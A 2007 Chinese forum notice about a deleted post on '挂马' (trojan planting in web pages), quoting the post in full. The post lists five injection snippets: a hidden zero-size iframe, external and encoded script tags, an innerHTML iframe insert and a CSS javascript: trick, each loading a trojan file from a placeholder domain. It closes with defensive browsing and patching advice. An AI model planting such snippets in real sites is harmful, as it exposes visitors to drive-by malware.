这是由论坛系统自动发送的通知短消息。
以下您所发表的主题被 小鹏 执行 删除 操作。
主题: 挂马的方法(很多人对挂马有兴趣啊)
发表时间: 2007-5-28 03:41 PM
所在论坛: SEO技术
操作理由: 违规内容
如果您对本管理操作有异议,请与我取得联系。
偶发贴是好意...我怎么看发AD帖子删的很慢啊...发个这种帖子马上消失....
看到论坛有人问怎么查挂的马...
偶贴一些方法出来,以后大家看页面也小心一下这些字样的代码撒
一、最简单的也是最有效的
<iframe src=http://www.domain.com/muma.html width=0 height=0></iframe>
二、js挂马
<script src=http://www.domain.com/muma.js></script>
三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.domain.com/muma.txt></script>muma.txt可改成任意后缀的
四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.domain.com/muma.htm/"></iframe>';
五、Css中挂马
body {background-image: url('javascript:document.write("<script src=http://www.domain.net/muma.js></script>")');}
css因为可以把内容提取到css文件,所以比较隐蔽...
六、Flash挂马
偶没玩过...
木马不是中了以后再找就能解决问题,要从源头解决问题...
代码严谨,服务器权限设置,补丁及时更新....都是比较不错的方法
防止中毒也不一定要靠杀毒软件...好的上网习惯等等都是很不错的方法
偶说下我一般怎么上网...
1.SEX站尽量不去,去的话也只去自己熟悉的...
2.浏览器开的话平时尽量屏蔽Javascript 图片 Active控件等....除非必须要用到这些再开启...而且如果那个网址你不经常去,要看一些网页源文件,看有没上边偶提到的那几种挂马的东东在...
3.邮件附件不确定的不下载...下载也杀毒...别人给的文件也不接,除非是自己需要的文件....
4.系统补丁一定即使更新..这个比杀毒有用...虽然很多0day还是掌握在某些黑客手中...但那些毕竟是少数的...中那些人的标不丢人..
